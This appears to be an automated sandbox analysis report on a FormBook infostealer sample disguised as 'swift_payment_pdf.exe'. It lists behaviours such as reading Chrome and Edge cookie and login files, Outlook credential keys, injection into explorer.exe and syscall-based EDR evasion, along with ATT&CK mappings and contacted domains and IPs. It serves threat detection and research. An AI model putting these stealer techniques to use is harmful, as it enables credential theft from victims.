            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 5.2.swift_payment_pdf.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.swift_payment_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.3554688554.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2253099345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3556641408.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3554923179.0000000004D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2253540662.0000000001270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2254428073.0000000002CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 5.2.swift_payment_pdf.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.swift_payment_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.3554688554.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2253099345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3556641408.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3554923179.0000000004D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2253540662.0000000001270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2254428073.0000000002CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading            		512
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		121
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism            		1
            Disable or Modify Tools            		LSASS Memory2
            Process Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		41
            Virtualization/Sandbox Evasion            		Security Account Manager41
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook512
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets2
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Abuse Elevation Control Mechanism            		Cached Domain Credentials113
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
            Obfuscated Files or Information            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
            Software Packing            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            DLL Side-Loading            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1467534 Sample: swift_payment_pdf.exe Startdate: 04/07/2024 Architecture: WINDOWS Score: 100 31 www.tofcomy.xyz 2->31 33 www.wwfglobal.com 2->33 35 13 other IPs or domains 2->35 47 Snort IDS alert for network traffic 2->47 49 Multi AV Scanner detection for domain / URL 2->49 51 Malicious sample detected (through community Yara rule) 2->51 55 9 other signatures 2->55 10 swift_payment_pdf.exe 3 2->10         started        signatures3 53 Performs DNS queries to domains with low reputation 31->53 process4 file5 29 C:\Users\user\...\swift_payment_pdf.exe.log, ASCII 10->29 dropped 67 Injects a PE file into a foreign processes 10->67 14 swift_payment_pdf.exe 10->14         started        signatures6 process7 signatures8 69 Maps a DLL or memory area into another process 14->69 17 AbWHWpocGREf.exe 14->17 injected process9 signatures10 43 Injects code into the Windows Explorer (explorer.exe) 17->43 45 Found direct / indirect Syscall (likely to bypass EDR) 17->45 20 explorer.exe 13 17->20         started        process11 signatures12 57 Tries to steal Mail credentials (via file / registry access) 20->57 59 Tries to harvest and steal browser information (history, passwords, etc) 20->59 61 Modifies the context of a thread in another process (thread injection) 20->61 63 3 other signatures 20->63 23 AbWHWpocGREf.exe 20->23 injected 27 firefox.exe 20->27         started        process13 dnsIp14 37 www.cheapdesklamp.shop 194.195.220.41, 60632, 60633, 60634 NEXINTO-DE Germany 23->37 39 www.tofcomy.xyz 162.0.236.122, 60636, 60637, 60638 NAMECHEAP-NETUS Canada 23->39 41 5 other IPs or domains 23->41 65 Found direct / indirect Syscall (likely to bypass EDR) 23->65 signatures15

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            swift_payment_pdf.exe26%VirustotalBrowse
            swift_payment_pdf.exe100%AviraHEUR/AGEN.1309958

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            www.qaronvc.lol1%VirustotalBrowse
            www.piqia.top1%VirustotalBrowse
            chefmikesrecipes.com0%VirustotalBrowse
            td-ccm-neg-87-45.wixdns.net0%VirustotalBrowse
            alanbeanart.com0%VirustotalBrowse
            enagicwebsystem.com0%VirustotalBrowse
            www.alanbeanart.com0%VirustotalBrowse
            www.wepayassessments.com1%VirustotalBrowse
            www.wwfglobal.com0%VirustotalBrowse
            www.enrich-pet.com5%VirustotalBrowse
            www.chefmikesrecipes.com0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://www.fontbureau.com/designersG0%URL Reputationsafe
            http://www.fontbureau.com/designers/?0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.fontbureau.com/designers?0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            http://www.fontbureau.com/designers0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.fonts.com0%URL Reputationsafe
